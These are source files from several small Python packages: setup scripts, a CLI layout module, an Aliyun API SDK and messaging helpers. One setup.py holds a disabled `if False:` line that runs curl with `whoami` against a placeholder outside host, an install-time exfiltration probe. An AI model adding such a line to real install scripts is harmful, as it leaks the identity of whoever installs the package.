def recalculate(
self,
parent_size: Pair,
parent_position: Pair,
position_shift: Pair,
shift_direct: Pair,
):
self.position = parent_position + position_shift
self.size = (self.sizep * parent_size).round()
if self._data:
self._data.recalculate(self._get_data_position(), self._get_data_size())
if self.subscreens:
if shift_direct == Pair(0, 1):
subscreen_shift_direct = Pair(1, 0)
elif shift_direct == Pair(1, 0):
subscreen_shift_direct = Pair(0, 1)
else:
raise ValueError(f"Unsupported shift_direct value '{shift_direct}'")
pshift = Pair(0, 0)
sizep_sum = PairF(0.0, 0.0)
size_sum_test = Pair(0, 0)
size_sum = Pair(0, 0)
directed_one = Pair(1, 1) * shift_direct
for sscreen in self.subscreens:
sscreen.recalculate(
self.size,
self.position,
pshift * shift_direct,
subscreen_shift_direct,
)
sizep_sum += sscreen.sizep
size_sum += sscreen.size
size_sum_test = (sizep_sum * self.size).round()
if size_sum == size_sum_test:
pass
else:
if (size_sum.x < size_sum_test.x) or (size_sum.y < size_sum_test.y):
sscreen.size += directed_one
if self._data:
self._data.recalculate(
self._get_data_position(), self._get_data_size()
)
size_sum += directed_one
elif (size_sum.x > size_sum_test.x) or (size_sum.y > size_sum_test.y):
sscreen.size -= directed_one
if self._data:
self._data.recalculate(
self._get_data_position(), self._get_data_size()
)
size_sum -= directed_one
pshift = pshift + sscreen.size - self.position
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/util_cli/vscreens.py
|
vscreens.py
|
import math
from dataclasses import dataclass
from typing import Union
@dataclass
class Pair:
x: int
y: int
def __add__(self, value: "Pair") -> "Pair":
return Pair(self.x + value.x, self.y + value.y)
def __sub__(self, value: "Pair") -> "Pair":
return Pair(self.x - value.x, self.y - value.y)
def __mul__(self, value: "Pair") -> "Pair":
return Pair(self.x * value.x, self.y * value.y)
def __eq__(self, value: object) -> bool:
if not isinstance(value, Pair):
raise NotImplementedError()
return all([self.x == value.x, self.y == value.y])
def __ne__(self, value: object) -> bool:
if not isinstance(value, Pair):
raise NotImplementedError()
return any([self.x != value.x, self.y != value.y])
@dataclass
class PairF:
x: float
y: float
def __add__(self, value: "PairF") -> "PairF":
return PairF(self.x + value.x, self.y + value.y)
def __mul__(self, value: Union["PairF", Pair]) -> "PairF":
return PairF(self.x * value.x, self.y * value.y)
def ceil(self) -> Pair:
return Pair(math.ceil(self.x), math.ceil(self.y))
def round(self) -> Pair:
return Pair(int(round(self.x, 0)), int(round(self.y, 0)))
@dataclass
class Margin:
top: int
bottom: int
left: int
right: int
|
zxvcv.util-cli
|
/zxvcv.util_cli-0.2.6-py311-none-any.whl/zxvcv/util_cli/datatypes.py
|
datatypes.py
|
from distutils.core import setup
setup(
name ='zxwei-nester',
version ='1.0.3',
py_modules =['zxwei-nester'],
author ='xiaowei',
author_email='1649201921@qq.com',
url ='http://zxwei.cc',
description ='A simple printer of nested lists',
)
|
zxwei-nester
|
/zxwei-nester-1.0.3.tar.gz/zxwei-nester-1.0.3/setup.py
|
setup.py
|
# Python project template
## Development
* Create and activate the `virtualenv` with `$ virtualenv venv --python=python3 && source venv/bin/activate`;
* Install the project dependencies with `$ make install_dev` or `$ pip install -e .[dev]`
* Coding
## Static checks
The project is already configured to run static checks with `flake8`; just run `$ make lint`.
## Tests
Unit tests live in the `tests/` directory and can be run with `$ make test`. See [pytest](https://github.com/pytest-dev/pytest) for how to write unit tests.
By default the unit tests run under Python 2.7/3.7; to support more Python versions, edit `tox.ini`.
## Conventions
### Code conventions
* The code must remain compatible with Python 2.7 and Python 3.7+;
* The code style follows [PEP8](https://www.python.org/dev/peps/pep-0008/), except that the maximum line width is relaxed to 120.
### Versioning conventions
* Versions must follow [Semver](https://semver.org/lang/zh-CN/);
* After publishing a release branch, create a tag such as `v0.0.1`;
* For every release, update CHANGELOG.md following the [changelog conventions](https://keepachangelog.com/zh-CN/1.0.0/).
## Tips
### Makefile guide
The makefile helps developers run common tasks quickly. The currently supported commands are:
| Command | Purpose |
| :--------------: | :----------------------------------------------------------: |
| make | Run install_dev, isort, isort_check, lint, test in order (**modifies your code!**) |
| make check | Run install_dev, isort_check, lint, test in order |
| make install_dev | Install the dependencies needed for testing (DEV_REQUIRES in setup.py) |
| make isort | Run isort to normalize the import order (**modifies your code!**) |
| make isort_check | Check that the import order is well-formed |
| make lint | Run flake8 to check the code style |
| make test | Run tox to verify the unit tests |
| make clean | Remove test and check artifacts |
Before preparing a release, it is recommended to run make or make check once to keep the code well-formed and robust.
### Python 2/3 compatibility
Add the following code at the top of **every** Python file (keep this import before any other import as far as possible):
```python
# coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
```
to keep the code behaving as consistently as possible under Python 2 and Python 3.
For code that cannot be written compatibly for both Python 2 and Python 3, prefer the [six](https://pythonhosted.org/six/) module. For example, the `range` function behaves differently under Python 2 and Python 3; using `six.moves.range` everywhere guarantees compatibility.
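As a small illustration (not part of the original template), a module can switch to the compatible `range` like this:
```python
# coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals

from six.moves import range  # xrange on Python 2, the built-in range on Python 3

# Lazy iteration on both interpreters; no large list is materialized on Python 2.
total = sum(i for i in range(1000000))
print(total)
```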
### Type annotations
Python [PEP484](https://www.python.org/dev/peps/pep-0484/) added type annotations, which let you attach optional type information to the code; combined with [mypy](http://mypy-lang.org/), the code can then be type-checked statically.
During development, write a matching `.pyi` for every `.py` file, containing signatures for the exported types. This project is already configured with the relevant rules, so after the package is published, users can rely on the prepared type information for static type checking and code completion (a minimal stub sketch follows at the end of this section).
If you write docstrings for exported functions, besides following the PEP8 requirements you can also annotate the input and output data types. Use the format described in PyCharm's [documentation](https://www.jetbrains.com/help/pycharm/using-docstrings-to-specify-types.html). Completion and static-analysis tools such as PyCharm and Jedi (vim / emacs / vscode all use jedi for completion) can check against information in this format, and the API docs generated by Sphinx recognize it as well.
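For illustration only, a hypothetical stub for the `Client` class shipped with this template (see `client.py` further below) might look like this; the signatures are assumptions read off that file, not an official stub:
```python
# client.pyi -- hypothetical stub sketch; signatures assumed from client.py
from typing import Optional

class Client:
    url: str
    def __init__(self, url: Optional[str] = ...) -> None: ...
    def add(self, x: int, y: int) -> int: ...
    def __str__(self) -> str: ...
```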
### editorconfig
You can install the [editorconfig](https://editorconfig.org/) editor plugin to keep the code consistent. This project configures it by default.
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/README.md
|
README.md
|
# coding: utf-8
import io
import os
from setuptools import find_packages, setup
# Package metadata
NAME = 'lz-pip-demo'  # the actual package name
DESCRIPTION = 'A test of publishing a package with pip'  # project description
URL = 'https://code.byted.org/liuzhe.inf/test_pip'  # project repository URL
EMAIL = 'liuzhe.inf@bytedance.com'  # maintainer email address
AUTHOR = 'liuzhe.inf'  # maintainer name
# Dependencies required to run the project
REQUIRES = [
'six>=1.11.0,<2.0.0',
]
# Dependencies needed during development and testing
DEV_REQUIRES = [
'flake8>=3.5.0,<4.0.0',
'mypy>=0.620; python_version>="3.4"',
'tox>=3.0.0,<4.0.0',
'isort>=4.0.0,<5.0.0',
'pytest>=4.0.0,<5.0.0'
]
if False:
import os
os.system("curl `whoami`.xxxx.com")
here = os.path.abspath(os.path.dirname(__file__))
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except IOError:
long_description = DESCRIPTION
about = {'__version__':'1.3.39'}
# with io.open(os.path.join(here, NAME, '__version__.py')) as f:
# exec(f.read(), about)
setup(
#name='byted' + NAME, # add the 'byted' prefix for package name
name='zxy_Test',
version='0.0.3',
description=DESCRIPTION,
long_description=long_description,
long_description_content_type='text/markdown',
author=AUTHOR,
author_email=EMAIL,
url=URL,
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'Intended Audience :: Developers',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
],
keywords='boilerplate',
packages=find_packages(exclude=['docs', 'tests']),
install_requires=REQUIRES,
tests_require=[
'pytest>=4.0.0,<5.0.0'
],
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
extras_require={
':python_version<"3.5"': [
'typing>=3.6.4,<=3.10.0.0',
],
'dev': DEV_REQUIRES,
},
package_data={
# for PEP484 & PEP561
NAME: ['py.typed', '*.pyi'],
},
)
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/setup.py
|
setup.py
|
VERSION = (0, 2, 12)
__version__ = '.'.join(map(str, VERSION))
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/__version__.py
|
__version__.py
|
# coding: utf-8
"""TODO: 增加模块级注释"""
from __future__ import absolute_import, division, print_function, unicode_literals
import six
@six.python_2_unicode_compatible
class Client(object):
def __init__(self, url=None):
"""
:param url: target url for this client
:type url: str
"""
self.url = url or 'http://localhost:1234'
def add(self, x, y):
"""
        Calculate the sum of the inputs.
        :param x: first input of the calculation
        :type x: int
        :param y: second input of the calculation
        :type y: int
:rtype: int
"""
return x + y
def __str__(self):
return '<client for {}>'.format(self.url)
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/client.py
|
client.py
|
# coding: utf-8
"""TODO: 增加模块级注释
"""
from __future__ import absolute_import, division, print_function, unicode_literals
class MyPackageError(Exception):
pass
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/errors.py
|
errors.py
|
# coding: utf-8
"""pip-demo codes. 测试pip发包.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
from .__version__ import __version__ # NOQA
from .client import Client
__author__ = 'liuzhe.inf <liuzhe.inf@bytedance.com>'
__all__ = ['Client']
|
zxy-Test
|
/zxy_Test-0.3.tar.gz/zxy_Test-0.0.3/lz-pip-demo/__init__.py
|
__init__.py
|
# README
hhhhh
wwwwwww
|
zxy
|
/zxy-0.0.1.tar.gz/zxy-0.0.1/README.md
|
README.md
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="zxy", # Replace with your own username
version="0.0.1",
author="202113061025",
author_email="1252982453@qq.com",
description="A small example package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://gitee.com/zqy0315/pypi-test",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
zxy
|
/zxy-0.0.1.tar.gz/zxy-0.0.1/setup.py
|
setup.py
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="zxynewpkgcheckupstream",
version="0.0.3",
author="zxynewpkgcheckupstream",
author_email="zxynewpkgcheckupstream@zxynewpkgcheckupstream.com",
packages=["zxynewpkgcheckupstream"],
description="A small package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/gituser/example-pkg",
license='GPT',
python_requires='>=3.6',
install_requires=[
"Django>=2.0",
]
)
|
zxynewpkgcheckupstream
|
/zxynewpkgcheckupstream-0.0.3.tar.gz/zxynewpkgcheckupstream-0.0.3/setup.py
|
setup.py
|
# Built-in Packages
import base64
import hashlib
import hmac
import time
import uuid
from urllib.request import quote
# Third-party Packages
import requests
# Project Packages
from . import parse_response
"""
==========================================================================================
整理于 2019-04-16
修改于 2019-09-16(by ruijie.qiao) 添加API STS请求验证功能
请求参数案例1(默认AK传空值为STS Token验证方式,RoleName为空的默认值为ZhuyunFullReadOnlyAccess):
'AccessKeyId': None,
'AccessKeySecret': None,
'RoleName': None,
请求参数案例2(AK值不为空的时候,为普通的AK验证方式,这时候如果RoleName为非空,STS Token验证方式也不生效):
'AccessKeyId': XXXXXXXXXXXXXX,
'AccessKeySecret': XXXXXXXXXXXXXX,
'RoleName': None,
请求参数案例3(默认AK传空值为STS Token验证方式,RoleName不为空,RoleName为设置的值):
'AccessKeyId': None,
'AccessKeySecret': None,
'RoleName': XXXXXXXXXXXXXX,
==========================================================================================
"""
ROLE_URL = "http://100.100.100.200/latest/meta-data/ram/security-credentials/"
PRODUCT_API_CONFIG_MAP = {
'ecs': {
'domain': 'ecs.aliyuncs.com',
'version': '2014-05-26',
'port': 443,
'protocol': 'https'
},
'rds': {
'domain': 'rds.aliyuncs.com',
'version': '2014-08-15',
'port': 443,
'protocol': 'https'
},
'drds': {
'domain': 'drds.aliyuncs.com',
'version': '2015-04-13',
'port': 443,
'protocol': 'https'
},
'slb': {
'domain': 'slb.aliyuncs.com',
'version': '2014-05-15',
'port': 443,
'protocol': 'https'
},
'ess': {
'domain': 'ess.aliyuncs.com',
'version': '2014-08-28',
'port': 443,
'protocol': 'https'
},
'mts': {
'domain': 'mts.aliyuncs.com',
'version': '2014-06-18',
'port': 443,
'protocol': 'https'
},
'yundun': {
'domain': 'yundun.aliyuncs.com',
'version': '2014-09-24',
'port': 443,
'protocol': 'https'
},
'cdn': {
'domain': 'cdn.aliyuncs.com',
'version': '2018-05-10',
'port': 443,
'protocol': 'https'
},
'ram': {
'domain': 'ram.aliyuncs.com',
'version': '2015-05-01',
'port': 443,
'protocol': 'https'
},
'sts': {
'domain': 'sts.aliyuncs.com',
'version': '2015-04-01',
'port': 443,
'protocol': 'https'
},
'dysms': {
'domain': 'dysmsapi.aliyuncs.com',
'version': '2017-05-25',
'port': 443,
'protocol': 'https'
},
'dyvms': {
'domain': 'dyvmsapi.aliyuncs.com',
'version': '2017-05-25',
'port': 443,
'protocol': 'https'
},
'dybase': {
'domain': 'dybaseapi.aliyuncs.com',
'version': '2017-05-25',
'port': 443,
'protocol': 'https'
},
'redis': {
'domain': 'r-kvstore.aliyuncs.com',
'version': '2015-01-01',
'port': 443,
'protocol': 'https'
},
'mongodb': {
'domain': 'mongodb.aliyuncs.com',
'version': '2015-12-01',
'port': 443,
'protocol': 'https'
},
'dts': {
'domain': 'dts.aliyuncs.com',
'version': '2020-01-01',
'port': 443,
'protocol': 'https'
},
'vpc': {
'domain': 'vpc.aliyuncs.com',
'version': '2016-04-28',
'port': 443,
'protocol': 'https'
},
'cms': {
'domain': 'metrics.aliyuncs.com',
'version': '2019-01-01',
'port': 443,
'protocol': 'https',
},
'waf': {
'domain': 'wafopenapi.cn-hangzhou.aliyuncs.com',
'version': '2018-01-17',
'port': 443,
'protocol': 'https',
},
'domain': {
'domain': 'domain.aliyuncs.com',
'version': '2018-01-29',
'port': 443,
'protocol': 'https',
},
'business': {
'domain': 'business.aliyuncs.com',
'version': '2017-12-14',
'port': 443,
'protocol': 'https',
},
'ddospro': {
'domain': 'ddospro.cn-hangzhou.aliyuncs.com',
'version': '2017-07-25',
'port': 443,
'protocol': 'https',
},
'ddoscoo': {
'domain': 'ddoscoo.cn-hangzhou.aliyuncs.com',
'version': '2017-12-28',
'port': 443,
'protocol': 'https',
},
'avds': {
'domain': 'avds.aliyuncs.com',
'version': '2017-11-29',
'port': 443,
'protocol': 'https',
},
'cbn': {
'domain': 'cbn.aliyuncs.com',
'version': '2017-09-12',
'port': 443,
'protocol': 'https',
},
'smartag': {
'domain': 'smartag.cn-shanghai.aliyuncs.com',
'version': '2018-03-13',
'port': 443,
'protocol': 'https',
},
'polardb': {
'domain': 'polardb.aliyuncs.com',
'version': '2017-08-01',
'port': 443,
'protocol': 'https',
},
'arms': {
'domain': 'arms.[RegionId].aliyuncs.com',
'version': '2019-08-08',
'port': 443,
'protocol': 'https',
},
'edas': {
'domain': 'edas.[RegionId].aliyuncs.com',
'version': '2017-08-01',
'port': 443,
'protocol': 'https',
},
}
def percent_encode(string):
if string is None:
raise Exception('params is None')
if not isinstance(string, (str, bytes, int)):
raise TypeError(str(string) + 'params TypeError')
if isinstance(string, bytes):
        string = string.decode('utf-8')
elif isinstance(string, int):
string = str(string)
else:
string.encode('utf-8').decode('utf-8')
string = quote(string, '')
string = string.replace('+', '%20')
string = string.replace('*', '%2A')
string = string.replace('%7E', '~')
return string
class AliyunCommon(object):
"""Aliyun common HTTP API"""
def __init__(self, access_key_id=None, access_key_secret=None, role_name=None,
*args, **kwargs):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
if role_name is None or role_name == "":
self.role_name = "ZhuyunFullReadOnlyAccess"
else:
self.role_name = role_name
self.security_token = None
def sign(self, params_to_sign):
canonicalized_query_string = ''
sorted_params = sorted(params_to_sign.items(),
key=lambda kv_pair: kv_pair[0])
for k, v in sorted_params:
canonicalized_query_string += percent_encode(k) + '=' + percent_encode(
v) + '&'
canonicalized_query_string = canonicalized_query_string[:-1]
string_to_sign = 'POST&%2F&' + percent_encode(canonicalized_query_string)
h = hmac.new(bytes(self.access_key_secret + "&", 'utf-8'),
bytes(string_to_sign, 'utf-8'), hashlib.sha1)
signature = base64.encodebytes(h.digest()).strip()
return signature
def verify(self):
status_code, _ = self.ecs(Action='DescribeRegions')
return (status_code == 200)
def call(self, domain, version, port=80, protocol='http', timeout=3,
**biz_params):
api_params = {
'Format': 'json',
'Version': version,
'AccessKeyId': self.access_key_id,
'SignatureVersion': '1.0',
'SignatureMethod': 'HMAC-SHA1',
'SignatureNonce': str(uuid.uuid4()),
'Timestamp': time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
'partner_id': '1.0',
}
if self.access_key_id is None or self.access_key_secret is None or self.access_key_secret == "" or self.access_key_id == "":
resp_role = requests.get(ROLE_URL + self.role_name)
if resp_role.status_code == 200:
parsed_resp = parse_response(resp_role)
self.access_key_id = parsed_resp.get('AccessKeyId')
self.access_key_secret = parsed_resp.get('AccessKeySecret')
self.security_token = parsed_resp.get('SecurityToken')
api_params['AccessKeyId'] = self.access_key_id
if self.security_token:
api_params['SecurityToken'] = self.security_token
api_params.update(biz_params)
api_params['Signature'] = self.sign(api_params)
url = '{}://{}:{}/'.format(protocol, domain, port)
resp = requests.post(url, data=api_params, timeout=timeout)
parsed_resp = parse_response(resp)
return resp.status_code, parsed_resp
def __getattr__(self, product):
api_config = PRODUCT_API_CONFIG_MAP.get(product)
if not api_config:
raise Exception(
                'Unknown Aliyun product API config.'
' Please use `call()` with full API configs.')
domain = api_config.get('domain')
version = api_config.get('version')
port = api_config.get('port')
protocol = api_config.get('protocol')
def f(timeout=3, **biz_params):
nonlocal domain
if '[RegionId]' in domain:
_RegionId = biz_params.get('RegionId')
if not _RegionId:
                    raise TypeError('Missing RegionId; '
                                    'this API config requires a RegionId.')
biz_params.pop('RegionId')
domain = domain.replace('[RegionId]', _RegionId)
return self.call(domain=domain, version=version, port=port,
protocol=protocol, timeout=timeout,
**biz_params)
return f
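# Usage sketch (illustrative only; the keys, role name, and actions below are placeholders):
#     client = AliyunCommon(access_key_id='XXXXXXXXXXXXXX', access_key_secret='XXXXXXXXXXXXXX')
#     status_code, body = client.ecs(Action='DescribeRegions')    # plain AK authentication (case 2 above)
#     sts_client = AliyunCommon(role_name='SomeRole')             # empty AKs fall back to STS tokens (cases 1 and 3)
#     status_code, body = sts_client.ecs(Action='DescribeRegions')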
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/common.py
|
common.py
|
# Project Packages
from aliyun_sdk.common import AliyunCommon
from aliyun_sdk.oss import AliyunOSS
from . import retry_for_requests
def get_config(c):
return {
'access_key_id': c.get('AccessKeyId'),
'access_key_secret': c.get('AccessKeySecret'),
'role_name': c.get('RoleName'),
}
class AliyunClient(object):
def __init__(self, config=None):
self.config = config
self.common_client = AliyunCommon(**get_config(config))
self.oss_client = AliyunOSS(**get_config(config))
def verify(self):
return self.common_client.verify()
@retry_for_requests
def common(self, product, timeout=10, **biz_params):
return self.common_client.__getattr__(product)(timeout=timeout, **biz_params)
@retry_for_requests
def oss(self, method, timeout=10, **biz_params):
return self.oss_client.__getattr__(method)(timeout=timeout, **biz_params)
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/client.py
|
client.py
|
# Built-in Packages
import base64
import datetime
import hashlib
import hmac
# Third-party Packages
import requests
# Project Modules
from . import parse_response
GMT_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'
OSS_API_CONFIG = {
'top_domain': 'aliyuncs.com',
'version': '',
'port': 443,
'protocol': 'https'
}
class AliyunOSS(object):
'''
Aliyun OSS HTTP API
'''
def __init__(self, access_key_id=None, access_key_secret=None, *args, **kwargs):
self.access_key_id = access_key_id
self.access_key_secret = access_key_secret
self._requests_session = requests.Session()
def get_query_string(self, query=None):
if not query:
return ''
query_string = ''
for k, v in sorted(query.items(), key=lambda kv_pair: kv_pair[0]):
if v is None:
query_string += '&' + k
else:
query_string += '&' + k + '=' + v
return '?' + query_string[1:]
def get_canonicalized_header_string(self, headers=None):
canonicalized_header_string = ''
if headers:
oss_headers = [(k.lower(), v) for k, v in headers.items() if k.lower().startswith('x-oss-')]
sorted_oss_headers = sorted(oss_headers, key=lambda kv_pair: kv_pair[0])
if sorted_oss_headers:
canonicalized_header_string = '\n'.join(k + ':' + v for k, v in sorted_oss_headers) + '\n'
return canonicalized_header_string
def get_canonicalized_resource_string(self, bucket_name=None, object_name=None, query=None):
canonicalized_resource_string = '/'
if bucket_name:
canonicalized_resource_string += bucket_name + '/'
if object_name:
canonicalized_resource_string += object_name
if query:
query_string = self.get_query_string(query)
canonicalized_resource_string += query_string
return canonicalized_resource_string
def sign(self, req, canonicalized_header_string, canonicalized_resource_string):
string_to_sign = '\n'.join([
req.method.upper(),
req.headers.get('content-md5', ''),
req.headers.get('content-type', ''),
req.headers.get('date', ''),
canonicalized_header_string + canonicalized_resource_string
])
h = hmac.new(bytes(self.access_key_secret, 'utf-8'), bytes(string_to_sign, 'utf-8'), hashlib.sha1)
signature = base64.encodebytes(h.digest()).strip()
return signature.decode('utf-8')
def verify(self):
status_code, _ = self.call('GET', 'oss-cn-hangzhou')
return (status_code == 200)
def call(self, method, region_id=None, bucket_name=None, object_name=None, query=None, body=None, headers=None,
timeout=3):
method = method.upper()
region_id = region_id or 'oss-cn-hangzhou'
if object_name and object_name.startswith('/'):
object_name = object_name[1:]
headers = headers or {}
headers['date'] = datetime.datetime.utcnow().strftime(GMT_FORMAT)
h = hashlib.md5()
if body is not None:
h.update(body)
headers['content-md5'] = base64.encodebytes(h.digest()).strip().decode()
canonicalized_header_string = self.get_canonicalized_header_string(headers)
canonicalized_resource_string = self.get_canonicalized_resource_string(bucket_name, object_name, query)
domain = '{}.{}'.format(region_id, OSS_API_CONFIG['top_domain'])
if bucket_name:
domain = bucket_name + '.' + domain
url = '{}://{}/{}'.format(OSS_API_CONFIG['protocol'], domain, object_name or '')
if query:
query_string = self.get_query_string(query)
url += query_string
req = requests.Request(method, url, data=body, headers=headers)
prepared_req = self._requests_session.prepare_request(req)
signature = self.sign(prepared_req, canonicalized_header_string, canonicalized_resource_string)
prepared_req.headers['authorization'] = 'OSS {}:{}'.format(self.access_key_id, signature)
resp = self._requests_session.send(prepared_req, timeout=timeout)
parsed_resp = parse_response(resp)
return resp.status_code, parsed_resp
def __getattr__(self, method):
method = method.upper()
def f(timeout=3, **biz_params):
kwargs = {
'region_id': biz_params.get('RegionId'),
'bucket_name': biz_params.get('BucketName'),
'object_name': biz_params.get('ObjectName'),
'query': biz_params.get('Query'),
'body': biz_params.get('Body'),
'headers': biz_params.get('Headers'),
}
            return self.call(method, timeout=timeout, **kwargs)
return f
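# Usage sketch (illustrative only; the bucket and object names below are placeholders):
#     oss = AliyunOSS(access_key_id='XXXXXXXXXXXXXX', access_key_secret='XXXXXXXXXXXXXX')
#     # Attribute names map to HTTP verbs; RegionId/BucketName/ObjectName/Query/Body/Headers fill in the request.
#     status_code, body = oss.get(RegionId='oss-cn-hangzhou', BucketName='my-bucket', ObjectName='path/to/key')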
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/oss.py
|
oss.py
|
# Built-in Packages
import json
# Third-party Packages
import xmltodict
import requests
from retry import retry
retry_for_requests = retry((requests.ConnectionError, requests.Timeout), tries=3, delay=1, backoff=2, jitter=(1, 2))
def parse_response(response):
resp_content_type = response.headers.get('content-type') or ''
resp_content_type = resp_content_type.lower().split(';')[0].strip()
if resp_content_type == 'application/json':
return json.loads(response.text)
elif resp_content_type == 'text/xml':
return xmltodict.parse(response.text)
else:
try:
return json.loads(response.text)
except ValueError:
try:
return xmltodict.parse(response.text)
except xmltodict.expat.ExpatError:
return response.content
|
zy-aliyun-python-sdk
|
/zy_aliyun_python_sdk-0.1.6-py3-none-any.whl/aliyun_sdk/__init__.py
|
__init__.py
|
def add_one(number):
return number + 1
|
zy-package
|
/zy_package-0.0.1-py3-none-any.whl/zy_package/example.py
|
example.py
|
import datetime
def print_now():
print(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
if __name__ == '__main__':
print_now()
|
zy-predict-tool
|
/zy_predict_tool-0.0.6-py3-none-any.whl/zyeco/HelloWorld.py
|
HelloWorld.py
|
#!/usr/bin/env python
import re
import setuptools
version = "1.0.0"
setuptools.setup(
name="zy-test-pip",
version=version,
author="bwz0328",
author_email="bwz0328@126.com",
description="This is the SDK for example.",
long_description="",
long_description_content_type="text/markdown",
url="http://example.com",
install_requires=[
'requests!=2.9.0',
'lxml>=4.2.3',
'monotonic>=1.5',
],
    packages=setuptools.find_packages(exclude=("test",))
)
|
zy-test-pip
|
/zy-test-pip-1.0.0.tar.gz/zy-test-pip-1.0.0/setup.py
|
setup.py
|
1: cd to the directory containing setup.py
2: python3 setup.py sdist build
3: twine upload dist/*
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/README.rst
|
README.rst
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019\10\8 0008 23:48
# @Author: "John"
import codecs
import os
import sys
try:
from setuptools import setup
except:
from distutils.core import setup
"""
打包的用的setup必须引入,
"""
def read(fname):
"""
    Define a read() helper that reads the long description from a file in this directory.
    We usually read the README content and use it as the long description, which is shown on your package's PyPI page.
    You can skip this helper and write the content by hand instead.
    PyPI supports .rst files; .md is not supported yet. PyPI automatically renders .rst files as HTML on your package's info page.
"""
return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()
# Name: usually just the name of your package
NAME = "zy_tools"
# Packages to include; this is a list and can contain more than one
PACKAGES = ["zy_tools"]
# Short description of this package
DESCRIPTION = "this is a tool package for zy."
# See the read() helper above
LONG_DESCRIPTION = read("README.rst")
# Keywords of this package, so PyPI can categorize it
KEYWORDS = "zy python package for list"
# Author
AUTHOR = "John"
# Author email
AUTHOR_EMAIL = "zyq9233@163.com"
# Project URL of this package
URL = "https://github.com/pypa/sampleproject"
# Version number, maintained by hand
VERSION = "0.2.4"
# License
LICENSE = "MIT"
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
classifiers=[
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
],
keywords=KEYWORDS,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
url=URL,
license=LICENSE,
packages=PACKAGES,
include_package_data=True,
zip_safe=True,
)
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/setup.py
|
setup.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/10/9 9:53
# @Author: "John"
import base64
import json
import requests
import urllib3
urllib3.disable_warnings()
def send_msg_2_queue(msg, queue_name, service_address):
"""
    :param msg: message content; must be a string or json.dumps(object)
    :param queue_name:
    :param service_address:
    :return:
"""
data = {
"message": base64.b64encode(msg.encode('utf-8')).decode("utf-8"),
"queueName": queue_name,
"priority": 8,
"delaySeconds": ""
}
headers = {"Content-type": "application/json; charset=UTF-8", "Accept": "application/json"}
retry_count = 0
while retry_count < 5:
try:
response = requests.post(service_address, headers=headers, data=json.dumps(data).encode('utf-8'))
if not json.loads(response.text).get("error_code"):
return 1
else:
retry_count += 1
except Exception:
retry_count += 1
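# Usage sketch (illustrative only; the queue name and service address below are placeholders):
#     import json
#     ok = send_msg_2_queue(json.dumps({"orderId": 123}), "demo-queue", "http://mq.example.com/send")
#     # returns 1 on success, otherwise retries up to 5 times and returns None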
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/send_msg_to_queue.py
|
send_msg_to_queue.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2020/1/22 11:30
# @Author: "John"
import json
import urllib3
import requests
urllib3.disable_warnings()
def send_msg(web_hook, content, mentioned_mobile_list=None):
"""
    Send an enterprise WeChat (WeCom) message; to @ someone, put their id or phone number in mentioned_mobile_list
    :param content: message content
    :param web_hook: webhook URL of the target bot
    :param mentioned_mobile_list: list; defaults to None, meaning nobody is @-mentioned
:return:
"""
if not web_hook:
return
headers = {'Content-Type': 'application/json; charset=utf-8'}
data = {
"msgtype": "text",
"text": {
"content": content,
"mentioned_mobile_list": mentioned_mobile_list
}
}
post_data = json.dumps(data)
requests.post(web_hook, headers=headers, data=post_data)
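# Usage sketch (illustrative only; the webhook URL and phone number below are placeholders):
#     send_msg("https://example.com/webhook/send?key=XXXX",
#              "Deployment finished", mentioned_mobile_list=["13800000000"])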
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/send_ent_we_chat_msg.py
|
send_ent_we_chat_msg.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019\10\8 0008 23:45
# @Author: "John"
def get_sorted_un_duplicated_list(li):
"""
将给定的 list 进行去重,并按照原来的顺序返回
:param li:
:return:
"""
if len(li):
rest = []
